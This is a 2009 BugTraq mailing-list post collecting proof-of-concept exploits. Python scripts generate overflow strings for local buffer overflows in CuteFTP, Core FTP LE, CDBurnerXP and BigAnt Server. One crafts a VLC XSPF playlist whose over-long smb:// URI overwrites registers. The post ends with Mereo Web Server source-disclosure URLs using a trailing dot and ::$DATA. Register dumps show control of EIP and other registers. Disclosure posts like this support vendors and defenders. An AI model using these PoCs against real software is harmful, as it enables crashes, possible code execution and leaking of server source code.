BugTraq
Multiple Vulnerabilities Sep 25 2009 05:24PM
Dr_IDE (dr_ide hushmail com)
Usually I submit via milw0rm but it has been unresponsive all week.

Here are a few new vulnerabilities and updates.

-Dr_IDE

#!/usr/bin/env python

########################################################################
#############################

#

# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC

# Found By: Dr_IDE

# Download: http://www.cuteftp.com/downloads/

# Tested On: Windows 7 RC, XP might be more shell friendly

# Notes: This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.

# Because of differences in the internal process of each site type you may be able to get

# execution through one of these channels.

#

########################################################################
#############################

"""

EAX 02120000

ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA

EDX 41414141

EBX 00004141

ESP 0018C160

EBP 0018C230

ESI 0228BA88

EDI 41414141

EIP 77843913 ntdll.77843913

C 0 ES 002B 32bit 0(FFFFFFFF)

P 0 CS 0023 32bit 0(FFFFFFFF)

A 1 SS 002B 32bit 0(FFFFFFFF)

Z 0 DS 002B 32bit 0(FFFFFFFF)

S 0 FS 0053 32bit 7EFDD000(FFF)

T 0 GS 002B 32bit 0(FFFFFFFF)

D 0

O 0 LastErr ERROR_SUCCESS (00000000)

EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)

ST0 empty -??? FFFF 000000FF 00FF00FF

ST1 empty -??? FFFF 00000000 00008200

ST2 empty -??? FFFF 00010000 00010000

ST3 empty 431.99999034404754640

ST4 empty 1.0000000000000000000

ST5 empty 1.0000000000000000000

ST6 empty 16.000000000000000000

ST7 empty 16.000000000000000000

3 2 1 0 E S P U O Z D I

FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)

FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

"""

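# Filler string that is pasted into the application by hand (see the usage
# text printed below): 20000 ASCII 'A' bytes (0x41) and nothing else.
buff = ("\x41" * 20000)

OUTPUT_FILE = "CuteFTP.txt"


def main():
    """Write *buff* to CuteFTP.txt and print the manual reproduction steps.

    The file is plain text; ``with`` closes it even if the write fails.
    Only file errors are caught -- the original bare ``except`` also hid
    typos and keyboard interrupts behind the generic "couldn't be created"
    message.  ``print(...)`` with a single argument behaves the same under
    Python 2 and 3.
    """
    try:
        with open(OUTPUT_FILE, "w") as f1:
            f1.write(buff)
    except (IOError, OSError) as exc:
        # Same message as the original, plus the underlying reason.
        print("[-] Error. File couldn't be created.")
        print("[-] %s" % exc)
        return

    # NOTE(review): the header comment above says v8.3.3 while this banner
    # says v8.3.2 -- confirm which build was actually tested.
    print("\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC")
    print("By: Dr_IDE")
    print("\nFile Created Successfully.\n")
    print("Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom.")


if __name__ == "__main__":
    main()

###############################################################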
###########################################

#

# VLC Media Player 1.0.2 smb:// URI Handling Remote Stack Overflow PoC

# Found By: Dr_IDE

# Tested: Windows XP SP2 , XP SP3 and Windows 7 RC1 with VLC 1.0.2 "Goldeneye"

# Download: http://majorgeeks.com/downloadget.php?id=4674&file=1&evp=a87d1b50269ba27878899d30ec7cd947

#

########################################################################
##################################

# XPSP3 Crash

"""

EAX FFFFFFFE

ECX 42424242 <--------- w00t!

EDX 00000000

EBX 42424242

ESP 02EAF694

EBP 02EAF7C4

ESI 61CC8324 libacc_4.61CC8324

EDI 61CC8323 libacc_4.61CC8323

EIP 77C478AC msvcrt.77C478AC

C 0 ES 0023 32bit 0(FFFFFFFF)

P 0 CS 001B 32bit 0(FFFFFFFF)

A 0 SS 0023 32bit 0(FFFFFFFF)

Z 0 DS 0023 32bit 0(FFFFFFFF)

S 0 FS 003B 32bit 7FFAC000(FFF)

T 0 GS 0000 NULL

D 0

O 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)

EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)

ST0 empty -UNORM FB18 0184A1C0 00AD4518

ST1 empty +UNORM 2088 00000000 00000000

ST2 empty 0.3987488760738806780e-4933

ST3 empty -??? FFFF 00000000 77C2C42E

ST4 empty +UNORM 0B10 00B094E8 00000000

ST5 empty 0.3987486256431287370e-4933

ST6 empty 0.0

ST7 empty -0.2650710894356302916

3 2 1 0 E S P U O Z D I

FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)

FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

"""

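# XSPF playlist skeleton.  The over-long text is placed inside the <location>
# element, as the path part of an smb:// URI.
# NOTE(review): the "(at)", "(dot)" and "[email concealed]" tokens in the
# location look like list-archive address obfuscation applied to the posted
# text rather than the author's literal URI -- confirm against the original.
header1 = (
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
    "<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n"
    "\t<title>Playlist</title>\n"
    "\t<trackList>\n"
    "\t\t<track>\n"
    "\t\t\t<location>smb://example.com (at) www.example (dot) com [email concealed]/foo/#{"
)

# 2 x 'A', 4 x 'B', then 10000 x 'C'.  The XP SP3 register dump above shows
# ECX and EBX holding 42424242, consistent with the four 'B' bytes.
payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)

header2 = (
    "}</location>\n"
    "\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n"
    "\t\t\t\t<vlc:id>0</vlc:id>\n"
    "\t\t\t</extension>\n"
    "\t\t</track>\n"
    "\t</trackList>\n"
    "</playlist>\n"
)

OUTPUT_FILE = "vlc_1.0.2.xspf"


def build_playlist():
    """Return the complete playlist text: header1 + payload + header2."""
    return header1 + payload + header2


def main():
    """Write the playlist to vlc_1.0.2.xspf.

    ``with`` closes the file even if the write fails.  Only file errors are
    caught; the original bare ``except`` also hid typos and keyboard
    interrupts behind the same one-word "Error" message.  Text mode ("w")
    is kept from the original, so the "\\n" line ends are translated on
    Windows exactly as before.
    """
    try:
        with open(OUTPUT_FILE, "w") as f1:
            f1.write(build_playlist())
    except (IOError, OSError) as exc:
        print("Error")
        print("[-] %s" % exc)
        return
    print("\nExploit file created!\n")


if __name__ == "__main__":
    main()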

#!/usr/bin/env python

########################################################################
############

#

# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)

# Found By: Dr_IDE

# Tested On: XPSP3, 7RC

# Notes: Most likely other versions are vulnerable too.

# Usage: File, Quick Connect, Paste into Hostname, Connect

#

########################################################################
############

# Register Dump on XPSP3

"""

EAX 00000064

ECX 00410041 coreftp.00410041

EDX 0054F840 coreftp.0054F840

EBX 026E2FFC

ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

EBP 00410041 coreftp.00410041

ESI 0269CC30

EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

EIP 00410041 coreftp.00410041

C 0 ES 002B 32bit 0(FFFFFFFF)

P 0 CS 0023 32bit 0(FFFFFFFF)

A 0 SS 002B 32bit 0(FFFFFFFF)

Z 0 DS 002B 32bit 0(FFFFFFFF)

S 0 FS 0053 32bit 7EFD7000(FFF)

T 0 GS 002B 32bit 0(FFFFFFFF)

D 0

O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)

EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)

ST0 empty 0.0

ST1 empty 0.0

ST2 empty 0.0

ST3 empty 0.0

ST4 empty 0.0

ST5 empty 0.0

ST6 empty 0.0

ST7 empty 0.0

3 2 1 0 E S P U O Z D I

FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)

FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

"""

# After Passing Exception on XPSP3

# EIP 00410041 coreftp.00410041

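# 6000 ASCII 'A' bytes (0x41), pasted by hand into the Hostname field as the
# header's usage line describes.  The register dump above shows 00410041 in
# several registers, consistent with these single bytes being widened to
# UTF-16 code units inside the application -- hence "(Unicode)" in the title.
buff = ("\x41" * 6000)

OUTPUT_FILE = "coreftple.txt"


def main():
    """Write *buff* to coreftple.txt.

    ``with`` closes the file even when the write fails; the original left
    the handle open in that case.  Errors still propagate as tracebacks,
    as before -- there was no handler to preserve.
    """
    with open(OUTPUT_FILE, "w") as f1:
        f1.write(buff)


if __name__ == "__main__":
    main()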

#!/usr/bin/env python

########################################################################
############

#

# CDBurnerXP v 4.2.4.1351 Local Crash PoC

# Found By: Dr_IDE

# Tested On: XPSP3, 7RC

# Usage: Create New Data Disc, Add a Folder, Paste to Rename Folder, Click Save Compilation as ISO

# Notes: Super lame and most likely not exploitable.

#

########################################################################
############

'''

Error Message:

System.NullReferenceException: Object reference not set to an instance of an object.

at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)

at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender, EventArgs e)

at System.Windows.Forms.MenuItem.OnClick(EventArgs e)

at System.Windows.Forms.MenuItem.MenuItemData.Execute()

at System.Windows.Forms.Command.Invoke()

at System.Windows.Forms.Command.DispatchID(Int32 id)

at System.Windows.Forms.Control.WmCommand(Message& m)

at System.Windows.Forms.Control.WndProc(Message& m)

at System.Windows.Forms.ScrollableControl.WndProc(Message& m)

at System.Windows.Forms.ContainerControl.WndProc(Message& m)

at System.Windows.Forms.Form.WndProc(Message& m)

at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)

at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)

at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)

at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)

at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

'''

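# 5000 ASCII 'A' bytes (0x41), pasted by hand as a folder name (see the usage
# line in the header).  The trace quoted above is a managed
# System.NullReferenceException raised in SaveAsIso, i.e. an unhandled .NET
# exception rather than a native memory fault; the author's own note already
# rates it as most likely not exploitable.
buff = ("\x41" * 5000)

OUTPUT_FILE = "cdburnerxp.txt"


def main():
    """Write *buff* to cdburnerxp.txt.

    ``with`` closes the file even when the write fails; the original left
    the handle open in that case.  Errors propagate as tracebacks, as before.
    """
    with open(OUTPUT_FILE, "w") as f1:
        f1.write(buff)


if __name__ == "__main__":
    main()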

#!/usr/bin/env python

########################################################################

#

# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

# Found By: Dr_IDE

# Tested: XPSP3

# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.

#

########################################################################

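# 10000 ASCII 'A' bytes (0x41) written under a .zip name.  The file is not a
# ZIP archive at all -- it is the application's handling of a malformed
# plug-in file that the header's usage line exercises.  Text mode ("w") is
# kept from the original; the content has no newlines, so the bytes on disk
# are the same on every platform.
buff = ("\x41" * 10000)

OUTPUT_FILE = "BigAntPlugIn.zip"


def main():
    """Write *buff* to BigAntPlugIn.zip.

    ``with`` closes the file even when the write fails; the original left
    the handle open in that case.  Errors propagate as tracebacks, as before.
    """
    with open(OUTPUT_FILE, "w") as f1:
        f1.write(buff)


if __name__ == "__main__":
    main()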

#!/usr/bin/env python

########################################################################

#

# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

# Found By: Dr_IDE

# Tested: XPSP3

# Usage: Open BigAnt Console, Go to Update, Add our zip, Boom.

#

########################################################################

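# 10000 ASCII 'A' bytes (0x41) written under a .zip name.  As with the
# plug-in variant above, the file is not a ZIP archive; only the output
# file name (and, per the header, the console menu it is fed to) differs.
# Text mode ("w") is kept from the original; the content has no newlines,
# so the bytes on disk are the same on every platform.
buff = ("\x41" * 10000)

OUTPUT_FILE = "BigAntUpdate.zip"


def main():
    """Write *buff* to BigAntUpdate.zip.

    ``with`` closes the file even when the write fails; the original left
    the handle open in that case.  Errors propagate as tracebacks, as before.
    """
    with open(OUTPUT_FILE, "w") as f1:
        f1.write(buff)


if __name__ == "__main__":
    main()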

########################################################################
#########

#

# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure

# Found By: Dr_IDE

# Tested On: Windows XPSP3

#

########################################################################
#########

- Description -

Mereo Web Server v1.8 is a Windows-based HTTP server. This is the latest version of the application available.

Mereo is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

http://[ webserver IP]/[ file ][.]

http://[ webserver IP]/[ file ][::$DATA]

http://172.16.2.101/index.html.

http://172.16.2.101/index.html::$DATA



 
